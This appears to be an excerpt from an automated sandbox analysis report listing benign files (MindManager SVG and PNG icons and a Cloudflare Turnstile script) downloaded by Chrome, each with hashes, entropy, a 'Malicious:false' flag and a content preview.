                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#f2f2f2;}.cls-2{fill:gray;}.cls-3{fill:#fbcd58;}.cls-4{fill:#fff;}.cls-5{fill:#ffdc8d;}</style></defs><title>time_3_16</title><path class="cls-1" d="M2.49,15.5a5.62,5.62,0,0,1,0-.57A6,6,0,0,1,6.21,9.45l.29-.13V6.68l-.29-.13A6,6,0,0,1,2.47,1.07a5.62,5.62,0,0,1,0-.57H13.37q0,.3,0,.57A5.92,5.92,0,0,1,9.79,6.51l-.29.14v2.7l.29.14a5.92,5.92,0,0,1,3.61,5.44q0,.27,0,.57Z"/><path class="cls-2" d="M12.9,1v.07a5.44,5.44,0,0,1-3.32,5L9,6.33V9.67l.58.27a5.44,5.44,0,0,1,3.32,5V15H3v-.07a5.53,5.53,0,0,1,3.45-5L7,9.64V6.36l-.58-.27A5.53,5.53,0,0,1,3,1.07V1H12.9m.92-1H2.05A7.59,7.59,0,0,0,2,1.07,6.56,6.56,0,0,0,6,7V9a6.56,6.56,0,0,0-4,5.93A7.59,7.59,0,0,0,2.05,16H13.82a7.59,7.59,0,0,0,.08-1.07A6.41,6.41,0,0,0,10,9V7a6.41,6.41,0,0,0,3.9-5.9A7.59,7.59,0,0,0,13.82,0Z"/><path class="cls-3" d="M11.67,3H4V4H5v.65A4.65,4.65,0,0,0,6,6H7v6H9V6h1.35A2.51,2.51,0,0,0,11,4.65V4h1V3Z"/><path class="
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (42690)
                                                                Category:downloaded
                                                                Size (bytes):42691
                                                                Entropy (8bit):5.373060430099094
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:985094F1486391033426C17505182792
                                                                SHA1:D44FF6BEF2E3D9B2F6DEAA0170458B1AE39350D4
                                                                SHA-256:14B108C7F687C327D6AA759FD1D255A981D5D505B241B5B968B674E3BF50B2B9
                                                                SHA-512:D1A8015658A82AE64F2E93341B8CA15B0057DF298DF36ACB47188B330E0327CFE0392EE1FF94B9D3BE7BC7D689BDD536A86ADB873A7ADEDE10AE45AA9A9415DB
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://challenges.cloudflare.com/turnstile/v0/g/d2a97f6b6ec9/api.js
                                                                Preview:"use strict";(function(){function Et(e,a,r,o,c,u,g){try{var b=e[u](g),_=b.value}catch(l){r(l);return}b.done?a(_):Promise.resolve(_).then(o,c)}function wt(e){return function(){var a=this,r=arguments;return new Promise(function(o,c){var u=e.apply(a,r);function g(_){Et(u,o,c,g,b,"next",_)}function b(_){Et(u,o,c,g,b,"throw",_)}g(void 0)})}}function M(e,a){return a!=null&&typeof Symbol!="undefined"&&a[Symbol.hasInstance]?!!a[Symbol.hasInstance](e):M(e,a)}function Re(e,a,r){return a in e?Object.defineProperty(e,a,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[a]=r,e}function Be(e){for(var a=1;a<arguments.length;a++){var r=arguments[a]!=null?arguments[a]:{},o=Object.keys(r);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(r).filter(function(c){return Object.getOwnPropertyDescriptor(r,c).enumerable}))),o.forEach(function(c){Re(e,c,r[c])})}return e}function fr(e,a){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):628
                                                                Entropy (8bit):5.076072330318654
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:6F396842EA5A9F3C3D758C2A1C72E840
                                                                SHA1:5E409DECE431751705881D3FFAAF3C645243E243
                                                                SHA-256:BE7507BFFFE62CC1E92E2D568DE5036EAADB9804F39F7C546152D7306D3FD442
                                                                SHA-512:01E80C2708556537C0C43856B749132050636D8577E477DED42194B12D19117E1B5F8524BD7B3FB3B774F0F4F8BF9AFB5009167CB013A27BCEEA70712645247D
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/house.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#f03637;}.cls-2{fill:#fbb400;}.cls-3{fill:gray;}.cls-4{fill:#1c97e6;}.cls-5{fill:#fff;}</style></defs><title>house_16</title><rect class="cls-1" x="11" y="1" width="2" height="5"/><polygon class="cls-2" points="3 8.09 3 16 13 16 13 8.09 8 3 3 8.09"/><polygon class="cls-3" points="16 9 13.5 6.39 8 0 2.5 6.39 0 9 2.5 9 8 3.21 13.5 9 16 9"/><rect class="cls-4" x="4" y="9" width="3" height="3"/><rect class="cls-3" x="8" y="9" width="4" height="7"/><rect class="cls-5" x="10" y="12" width="1" height="1"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):916
                                                                Entropy (8bit):5.114226993661651
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:FAB1703859B87F794B6104B6D5C2B470
                                                                SHA1:F1C78476AB7237CAC82328DF21E6E9B769B43BC1
                                                                SHA-256:D096B0B38EAE050B206486F5087E4706590B43F880FC52DC15E833143EE64199
                                                                SHA-512:FC0D7E3DA6A11C785305D056ADF3F1D334DD788A3FC9F33081064FD8E63A6B6D026E79E35E2CD598289858618196DAA07A1A75370509DB5543A50A01E7F14880
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/Dependencies/TaskAutomationFinishToStart.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 15.5"><defs><style>.cls-1{fill:#ecf4fa;}.cls-2,.cls-3,.cls-5{fill:none;stroke-miterlimit:10;}.cls-2{stroke:#009245;}.cls-3{stroke:#3283c0;}.cls-4{fill:#3283c0;}.cls-5{stroke:#a20400;}.cls-6{fill:#a20400;}</style></defs><title>dependency F2S</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><rect class="cls-1" y="1" width="8" height="6"/><rect class="cls-1" x="8" y="8" width="7" height="6"/><rect class="cls-2" x="0.5" y="0.5" width="7" height="6"/><rect class="cls-3" x="7.5" y="8.5" width="8" height="6"/><polyline class="cls-2" points="2.5 3.5 3.5 4.5 6 2"/><line class="cls-3" x1="9" y1="11.5" x2="11.85" y2="11.5"/><polygon class="cls-4" points="11.41 13 14 11.5 11.41 10 11.41 13"/><line class="cls-5" x1="7.5" x2="7.5" y2="11.91"/><polygon class="cls-6" points="5.01 11.18 7.5 15.5 9.99 11.18 5.01 11.18"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):408
                                                                Entropy (8bit):5.2833287509585825
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:8C3BCB6C8755464DC42D2A19DF973079
                                                                SHA1:B864C3AA9DB1442173D99BF63656F7CA0B540A7A
                                                                SHA-256:2A064FF251F1FB785DBF6A7843F4A2493420FF91B7439B201761EEA3156BF892
                                                                SHA-512:951EFD55DC1567F47D82822ED1A48B7EE33E924C02660090F20F14CC2C7D66773331CF52F8C7FA1BC7668C1EA311EE3870B6B23D30FF78490B8EC4F7C945629C
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/resource-2.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#f03b37;}.cls-2{fill:#fff;}</style></defs><title>user_red_16</title><circle class="cls-1" cx="8" cy="8" r="8"/><circle class="cls-2" cx="8" cy="5" r="3"/><path class="cls-2" d="M9,8H7C5.54,8,3,9.24,3,10.75v2.88A9.43,9.43,0,0,0,8,15a9.43,9.43,0,0,0,5-1.37V10.75C13,9.24,10.46,8,9,8Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1081
                                                                Entropy (8bit):4.527153903060338
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:AEC2CAEBB8B26C7267CDDC18D97E9213
                                                                SHA1:4DE231712CC4170E5454035902598767614D1C0A
                                                                SHA-256:13B2F4ADE50FBF9EEC00CABFE5BD8D18501BFDC855271B38A73BC68DEA24850D
                                                                SHA-512:A3664B1F553B6AAB98BA89118E7DA1AFD5DAE4DD78B55F6D95E0DE421111A1AD465757004288DABBF886C714CF4BB9195290C7729F440D48D28E5306A3AF9A84
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/options-sort-alpha.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 30 30"><defs><style>.cls-1{fill:#3a52a4;}</style></defs><title>sort alpha</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M13.29,22a.76.76,0,0,1,0,1.07l-6,6A.59.59,0,0,1,7,29.2a.82.82,0,0,1-.57,0A.59.59,0,0,1,6.23,29l-6-6A.76.76,0,0,1,.22,22a.72.72,0,0,1,.53-.22.72.72,0,0,1,.53.22L6,26.69V.76A.74.74,0,0,1,6.23.22a.74.74,0,0,1,1.05,0A.74.74,0,0,1,7.5.76V26.69L12.22,22a.76.76,0,0,1,1.07,0ZM29.94,11a.74.74,0,0,1,0,.58.71.71,0,0,1-.4.4L29.4,12h-.15a.76.76,0,0,1-.69-.45L26.82,7.5H22.68l-1.74,4.06a.71.71,0,0,1-.4.4.7.7,0,0,1-.58,0,.71.71,0,0,1-.4-.4.74.74,0,0,1,0-.58L24.07.45a.75.75,0,0,1,.27-.33A.72.72,0,0,1,24.76,0a.76.76,0,0,1,.69.45Zm-2.2,19a.74.74,0,0,0,.54-.22.74.74,0,0,0,0-1.05.74.74,0,0,0-.54-.22H23l5.36-9.37a.73.73,0,0,0,0-.75.76.76,0,0,0-.28-.28.74.74,0,0,0-.38-.1h-6a.75.75,0,0,0-.75.75.74.74,0,0,0,.22.54.72.72,0,0,0,.53.22h4.7l-5.36,9.38a.82.82,0,0,0-.09.37.73.73,0,0,0,.1.3
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):802
                                                                Entropy (8bit):5.081061054477753
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:1176439FC438797243550D3E3BCACF0D
                                                                SHA1:934002F9FBC1EBC9D0308F6F1682C900ABFB566D
                                                                SHA-256:937E65666B1E77D7E281A482F09523921D656CD50124DC74D4B176AD4166EF2F
                                                                SHA-512:31D1D49DFF2A3AE21A2AA0EFCECEAA6409C23009573C6E7F22845F0DE65059A9C620D977FBF812D7CF46399A9262DF7956CD9B5D74C341FED2AE07698420F3B7
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/Dependencies/TaskAutomationFinishToFinish.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 15.99 15.5"><defs><style>.cls-1{fill:#ecf4fa;}.cls-2,.cls-3{fill:none;stroke-miterlimit:10;}.cls-2{stroke:#009245;}.cls-3{stroke:#a20400;}.cls-4{fill:#a20400;}</style></defs><title>dependency F2F</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><rect class="cls-1" y="9" width="13" height="6"/><rect class="cls-2" x="0.5" y="8.5" width="13" height="6"/><polyline class="cls-2" points="5.5 11.5 6.5 12.5 9 10"/><rect class="cls-1" y="1" width="13" height="6"/><rect class="cls-2" x="0.5" y="0.5" width="13" height="6"/><polyline class="cls-2" points="5.5 3.5 6.5 4.5 9 2"/><line class="cls-3" x1="13.5" x2="13.5" y2="11.91"/><polygon class="cls-4" points="11.01 11.18 13.5 15.5 15.99 11.18 11.01 11.18"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):10796
                                                                Entropy (8bit):7.946024875001343
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:12BDACC832185D0367ECC23FD24C86CE
                                                                SHA1:4422F316EB4D8C8D160312BB695FD1D944CBFF12
                                                                SHA-256:877AE491D9AAC5C6EF82A8430F9F652ACE8A0DBC7294BD112AAD49BD593769D0
                                                                SHA-512:36C319AC7F75202190E7A59F3F3C92892A71D5F17663E672319A745B6574BCFDE7C89B35F480CB15A193924DACB9D67F8CA1E1BC2BF33FC5CCBFA152CC7BA2D0
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:.PNG........IHDR.......^.....l2`...).IDATx..}...U.... w...B..P$.Hv..t......x.EA@.Q`.E......-.".(..X`..D....5]]U}....$3...&...guOw..}>.....~....w.ZZ...z..FZ$I.$I....N.......tt.$e...M....ru$I.$IR.h.AvK0.t..wy.:.1...D.H...LS....iF~.X...smr.$I.$IR.4.....SY..@....h8.....*..dB...1.eG...$I.$.hZ...8.r...[.A.I..XE..hdA{Z..teaF...u:}.1^..-I.$I.FP.A..Nm..........A78...=.%W_.$I..8YQ.H2z#.D_...m..k..u.t..R6#.....N....){...$I..1@...g...@a ..u2..dL...*ai.d.[.$I..D.....OM..a...,h%u.B.....0...57..hrW..$I....Gf.|.=.eg`.........k.J.$IR..<.u....]....@.d...H..$I.$5..MWwu:....H|Y..,.$.I.$I....Qu...s.NzzM..]..;$ I.$IR......+..L9......63.I@.$I..z..#.....:..7...s..<$ I.$I.hP.tu...m"..o1.y.@..W1T<(..... z%."?.4zE..$ ..Y1z`.P..!....`t%t....[..d...N.UKy&.A;..6S...<...........o...]0...r.$I......0..R.....N.....0Wi._.;...M..Lrb{.7w..].jm.r....C...&..gd}..Etm}..~L.l...}n\'...$..Mr.i..{..n..9.....SwMh.}.Q{./wJ.....B]:.....+..\V...A.S.w..6.....,..[.......J@....-.4.....:..Zvt.r.*.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1532
                                                                Entropy (8bit):4.901249399102056
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:ECB28AB79268C36B16C35FB556E75F8B
                                                                SHA1:FBB115DE33257F0086E60265A298C01C71A79180
                                                                SHA-256:42A560FAEE5815B33EB1135591903268F10835EB75829E15A68B4038FBF7F227
                                                                SHA-512:73EB1B7820E861DC60011C1A14D824D7D9945F75D16405C75CDFABCCD7559E4481BEF23F15D3E03047B8F70B81D0EAC51C333C1EE90FE9C5D905949B407E8119
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/on-hold.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#f03637;}.cls-2{fill:gray;}.cls-3{fill:#b3b3b3;}.cls-4{fill:#fff;}</style></defs><title>on_hold_16</title><path class="cls-1" d="M6,1A2,2,0,1,1,4,3,2,2,0,0,1,6,1M6,0A3,3,0,1,0,9,3,3,3,0,0,0,6,0Z"/><circle class="cls-2" cx="11.5" cy="2.5" r="2.5"/><polygon class="cls-3" points="5.99 10 6 1.99 6 10 5.99 10"/><path class="cls-3" d="M6,1H6A1,1,0,0,0,5,2v8a1,1,0,0,0,1,1H6a1,1,0,0,0,1-1V2A1,1,0,0,0,6,1Z"/><path class="cls-3" d="M7.31,14.36l0,0-5.86-5,.05-.12,5.9,5.05Z"/><path class="cls-3" d="M1.46,8.19a1,1,0,0,0-.81.37,1.07,1.07,0,0,0,.11,1.51l5.86,5a1.06,1.06,0,0,0,.69.26A1.08,1.08,0,0,0,8.12,15,1.06,1.06,0,0,0,8,13.48l-5.86-5a1,1,0,0,0-.69-.26Z"/><polygon class="cls-3" points="8.99 10 9 5.99 9 10 8.99 10"/><path class="cls-3" d="M9,5H9A1,1,0,0,0,8,6v4a1,1,0,0,0,1,1H9a1,1,0,0,0,1-1V6A1,1,0,0,0,9,5Z"/><polygon class="cls-3" points="10.99 11 11 6.99 11 11 10.99 11"/><path cla
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):717
                                                                Entropy (8bit):5.290072942275189
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:38FAE8181E5DB748041C272C3994D3F0
                                                                SHA1:0A5628A71FE14042F20FEE3ED9063B4FC4BCCD4E
                                                                SHA-256:6D0BB927EE38566219E22252F48F9E4C24FD0D7A5B82FAA1F278A1504BD20DB6
                                                                SHA-512:EAD838DDF5AE31BA40730553129CA7DEE27E62BC74746C4FAF9D9135B3ACB05E780379D55733A6C4EFF0FC9E2055F71C212D1B957863F984248CDC106B013F04
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/publish-toolbar/svg/search-next.svg
                                                                Preview:<?xml version="1.0" ?><!DOCTYPE svg PUBLIC '-//W3C//DTD SVG 1.1//EN' 'http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd'>.<svg enable-background="new 0 0 32 32" height="32px" version="1.1" viewBox="0 0 32 32" width="32px" xml:space="preserve" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <path clip-rule="evenodd" d="M32,16.009c0-0.267-0.11-0.522-0.293-0.714 l-9.899-9.999c-0.391-0.395-1.024-0.394-1.414,0c-0.391,0.394-0.391,1.034,0,1.428l8.193,8.275H1c-0.552,0-1,0.452-1,1.01 s0.448,1.01,1,1.01h27.586l-8.192,8.275c-0.391,0.394-0.39,1.034,0,1.428c0.391,0.394,1.024,0.394,1.414,0l9.899-9.999 C31.894,16.534,31.997,16.274,32,16.009z" fill="#3A52A4" fill-rule="evenodd"/>.</svg>.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 16 x 14, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):3206
                                                                Entropy (8bit):7.91742012431199
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:7DC4ABB04F46B0BD003D4AE92CF10BE6
                                                                SHA1:B7833AC0E365EECA500B5C8D81DA3196A496D327
                                                                SHA-256:8628B56DB7ABA287A2D3C9AA31FB7B578786E6C2F9545A5B50B3811223A90442
                                                                SHA-512:FE0954529945194F290FEC6FDFAD3E6B929B991EC2D2CCE382104E0039D5DD487B2D2EFFE42FD80F28407AF361540C5218BCECEE105C5C8CE0CBF5ACF1DD5F1E
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-add-hyperlink-selected.png
                                                                Preview:.PNG........IHDR.............&/......iCCPICC Profile..H....PS...{.CB.D@J.w.^C.^m.$.PBHA..+.......+M.......E@...,..X...w.Gx...y....r..s.|g... .0..4X..t.H...I.....~.....0.z..........>.G...k:S.......B&.P(.,!3..3.w1......$..Z......H....a..w.p...1.....'..$.C....F.,&..C.A......D...`!\..Izz...!l../u8.V3QR...Hxn.Y.{s..4....8.......C.qR..?...C.&5#P..!..e...r..?j..B..yf1...Y...1....\.=r.....l.O..>..$.!m......y.N....,n..y..F...xI..q...$..d.t.BoL.B...H...b%=...>.8/J...yJj..B%..4?I\..!yV.\.yNa...........@.x...@..A.H."@......|c..z..kD3Cxe.....d...."6..c...,,m......=uv. .Xf...yH...ch.p......1.w.u....n.X.5........P..@.h#;o....p.......d.8..0.y.IV..`....`7....ap.....h...ep.....<..`.....#.. ...!...i@..1d.9@......CqP..x..Z.m.."....j._.s.e.&..=...Q....F.$X.V..`s......Hx..3.l8.....U.q.........5<..()....2E9..P!.xT.J...C...P..VT...j.5....)h.....GG...L.Ft...].nB_E.E.....1d.*...cb1..jL...s.s.s....|.b.T.>....`.a......6l.v.;...q.8.\.....rq.p.q.p..a.'..^.o.....y....|.."...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):80240
                                                                Entropy (8bit):4.1709197561256905
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:6C367AB21C83B2366DBB43A6159960C8
                                                                SHA1:F0F5FA57E7453192AA06A5ECA78354DF0A11E4ED
                                                                SHA-256:459E1B87541728731F7EBDC37A92AE937874B700C83F558368330E5A40A5A7B9
                                                                SHA-512:79A2C42A20610C7358E7771F783BCC548E80B15D3462A3E7B7816B36F4053C1586986D12D788F8428875D7AD6D4057884A4A409B0A63D2680FFA1E29719314ED
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/use-cases/cards/cards_organization.svg
                                                                Preview:<svg width="200" height="250" viewBox="0 0 200 250" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_456_2606)">..<rect width="200" height="250" rx="10" fill="#D6E6FB"/>..<path opacity="0.5" d="M173.092 114.423C184.794 130.276 186.522 151.23 179.717 169.263C172.912 187.296 158.218 202.424 140.514 212.814C117.424 226.364 87.8337 232.159 61.6497 224.456C35.4656 216.752 14.3564 194.068 14.6023 169.226C14.7205 157.287 20.4691 144.567 32.2316 139.087C43.5676 133.805 57.825 136.22 69.2568 131.107C89.7382 121.947 93.495 94.7744 118 90.1015C137.445 86.3945 162.797 100.475 173.092 114.423Z" fill="#9CC5FB"/>..<path d="M39.4357 62.5H172.398C174.184 62.5 175.633 63.9484 175.633 65.735V147.412C175.633 149.198 174.184 150.647 172.398 150.647H39.4357C37.6491 150.647 36.2007 149.198 36.2007 147.412V65.735C36.2007 63.9484 37.6491 62.5 39.4357 62.5Z" fill="#F8FBFF"/>..<path fill-rule="evenodd" clip-rule="evenodd" d="M172.398 63.2348C173.779 63.2348 174.898 64.3543 174.898 65.735
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 50 x 38, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):506
                                                                Entropy (8bit):7.258699320064336
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:691D1BF807B05E6FD97161603F71FAD3
                                                                SHA1:E71A53956EB1DF0DB6E87F8DAA455211E26722CC
                                                                SHA-256:5B1997E3833A6C645DDACEB93B117E48615B0C5AE5A736B399F8ABFAD91616E4
                                                                SHA-512:C035999FB834F2341DD4654CC85F4DB1762D08B629BA9B1FB78FE82C225C6E3E041890C1A6B252076F5F26F6F324DD9ADD407D0AF1FBD11843DD4FFF5F4FD7E7
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/icon-shape-rounded-rectangle.png
                                                                Preview:.PNG........IHDR...2...&......x.<....pHYs.................tEXtSoftware.Adobe ImageReadyq.e<....IDATx..j.0..e9..!.!..!.gmm<g.#t.T....d........4g...)P0.:.qu...th..Vr?.m$..qwX..eY.UQ...U.Em...r..A.....~..|:.....,ku<..5.....Wy.....aH. .$.v.%.s.$Iy>.?......b6.I....}i.1c.X.PJ_....I.4.!.]...4.N..^."...GQ.. $.I.AD.5.nR|.Sr!B..A.+...u.n.#...5...<..0..D..q]W.F.A.F~..p..<.#..."..$..@.!.k.:kd4.5...VM...eY.0...A...@...n.u.....i..pU....9..7.....i.U4.G.../.....8..H.F.../...J.f..........@.....IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1231
                                                                Entropy (8bit):5.072095233908546
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:7C8956821E80F0EA04AAFD9E8F1A8813
                                                                SHA1:F4B38D39C9689593AC15545B66A9E04F01EC3E15
                                                                SHA-256:BAE85D70594C274E2FA6B0D52E6CE1CD496AC248584344D2FB8C6CBF3499520B
                                                                SHA-512:479F70489D875AE10D7A4A3E15A4C6B621E3058829066979A1EC36577706D8B11792B1693245C79125DE3E664A51B88CDEFA3D1A33B72769AC495D32243C2F5A
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/assets_fill.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 20 24"><defs><style>.cls-1{fill:none;}.cls-1,.cls-2{stroke:gray;stroke-miterlimit:10;}.cls-2{fill:#ccc;}.cls-3{fill:#7db7ea;}.cls-4{fill:#4f8ed4;}</style></defs><title>ribbon-Asset 64</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M2.5.5h14a1,1,0,0,1,1,1v6a8,8,0,0,1-8,8h0a8,8,0,0,1-8-8v-6a1,1,0,0,1,1-1Z" transform="translate(19 16) rotate(180)"/><path class="cls-2" d="M2.5,8.5h14a1,1,0,0,1,1,1V20.44a3.06,3.06,0,0,1-3.06,3.06H4.56A3.06,3.06,0,0,1,1.5,20.44V9.5a1,1,0,0,1,1-1Z"/><rect class="cls-2" x="0.5" y="8.5" width="18" height="2" rx="1"/><path class="cls-3" d="M5,17.5a.5.5,0,0,1-.5-.5V8.5h5V15a.5.5,0,0,1-1,0V13a1.5,1.5,0,0,0-3,0v4A.5.5,0,0,1,5,17.5Z"/><path class="cls-4" d="M9,9v4a2,2,0,0,0-4,0V9H9m1-1H4v9a1,1,0,0,0,2,0V13a1,1,0,0,1,2,0v2a1,1,0,0,0,2,0V8Z"/><path class="cls-3" d="M17.09,23.5a2.41,2.41,0,0,1-2.41-2.41c0-1.24,1.51-3.27,2.41-4.33.91,1.06,2.41,3.09,2.41,4.33A2.4
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):804
                                                                Entropy (8bit):5.187405994496448
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:29D5E29E0F7694267FEBC119EB73D243
                                                                SHA1:052EE43D8FD2F1879A476E629259B3C7464B1CB9
                                                                SHA-256:EAD2EB1560771877B1CA80AAE870EC96FFCA7B59DC579153E7F696DC0AC8E7E5
                                                                SHA-512:B43389243EDE0459E6FC2C4245608B1232E3806910D436B27C1F31D52785CE398B8FCC503B6ADFC66DACDA6DFC113779875CFA3B9F238189D248CE904A60CB36
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PercentageSVG/roPercentageDone02.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:#2a6bac;}.cls-3{fill:#4197ff;}.cls-4{fill:#2979cd;}.cls-5{fill:gray;}</style></defs><title>roPercentageDone02</title><circle class="cls-1" cx="8" cy="8" r="7.5"/><path class="cls-2" d="M8,1A7,7,0,1,1,1,8,7,7,0,0,1,8,1M8,0a8,8,0,1,0,8,8A8,8,0,0,0,8,0Z"/><path class="cls-3" d="M8.5.52a7.5,7.5,0,0,1,4.68,2.07L8.5,7.27Z"/><path class="cls-4" d="M9,1.07a6.89,6.89,0,0,1,3.46,1.54L9,6.06v-5M8,0V8h.48l5.41-5.41A8,8,0,0,0,8,0Z"/><path class="cls-5" d="M-.5,16.5v-4h1V11A1.5,1.5,0,0,1,2,9.5H3A1.5,1.5,0,0,1,4.5,11v1.5h1v4Z"/><path class="cls-1" d="M3,10a1,1,0,0,1,1,1v2H5v3H0V13H1V11a1,1,0,0,1,1-1H3M2,13H3V11H2v2M3,9H2a2,2,0,0,0-2,2v1H-1v5H6V12H5V11A2,2,0,0,0,3,9Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):506
                                                                Entropy (8bit):5.210707737854685
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:2E4F4A7C3E6686ECCF5CC3E553826BB2
                                                                SHA1:50A1AB5784064A92B70FC0579220D66BE0182F6E
                                                                SHA-256:73105DCBFAF0A0D8AD119B1BE2B23355FBEE921597C8573397D7D414965E4359
                                                                SHA-512:9C45D52E6E4763C22F4303CC5960D1699A5823EE1116DFB04EED1DDD36D05A8004F950212884065F663A3D70AF19F38D24ED39A8534BC0A0C119E1B9A2AEEEF9
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PercentageSVG/percentageDone05.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:#2a6bac;}.cls-3{fill:#4197ff;}.cls-4{fill:#2979cd;}</style></defs><title>percentageDone05</title><circle class="cls-1" cx="8" cy="8" r="7.5"/><path class="cls-2" d="M8,1A7,7,0,1,1,1,8,7,7,0,0,1,8,1M8,0a8,8,0,1,0,8,8A8,8,0,0,0,8,0Z"/><path class="cls-3" d="M8.5.52a7.5,7.5,0,0,1,0,15Z"/><path class="cls-4" d="M9,1.07A7,7,0,0,1,9,14.93V1.07M8,0V16A8,8,0,0,0,8,0Z"/></svg>
